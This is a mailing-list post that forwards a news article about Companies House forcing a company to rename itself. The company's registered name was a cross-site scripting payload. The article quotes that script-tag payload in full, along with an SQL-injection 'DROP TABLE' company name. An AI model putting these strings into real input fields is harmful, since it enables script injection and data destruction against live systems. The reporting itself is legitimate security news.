https://www.theguardian.com/uk-news/2020/nov/06/companies-house-forces-business-name-change-to-prevent-security-risk
Companies House has forced a company to change its name after it belatedly
realised it could pose a security risk.
The company now legally known as “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” was set up by a British software
engineer, who says he did it purely because he thought it would be “a fun playful name” for his consulting business.
He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as
“cross-site scripting”, which allows an attacker to run code from one website on another.
The original name of the company was
““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. By beginning the name
with a quotation mark and chevron, any site which failed to properly
handle the HTML code would have mistakenly thought the company name was
blank, and then loaded and executed a script from the site XSS Hunter,
which helps developers find cross-site scripting errors.
That script would have simply put up a harmless alert – but it serves as proof that a malicious attacker could instead have used
the same weakness as a gateway to more damaging ends.
Similar names have been registered in the past, such as “; DROP TABLE
“COMPANIES”;-- LTD”,
a wry attempt <https://pizzey.me/blog/no-i-didnt-try-to-break-companies-house/> to carry out an attack known as SQL injection,
inspired by a famous XKCD webcomic <https://xkcd.com/327/>, but this was the first such name to have prompted a response.
Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original
moniker now reads simply “Company name available on request”.
--
Kim Holburn
IT Network & Security Consultant
T: +61 2 61402408 M: +61 404072753
mailto:[email protected] aim://kimholburn
skype://kholburn - PGP Public Key on request
_______________________________________________
Link mailing list
[email protected]
http://mailman.anu.edu.au/mailman/listinfo/link
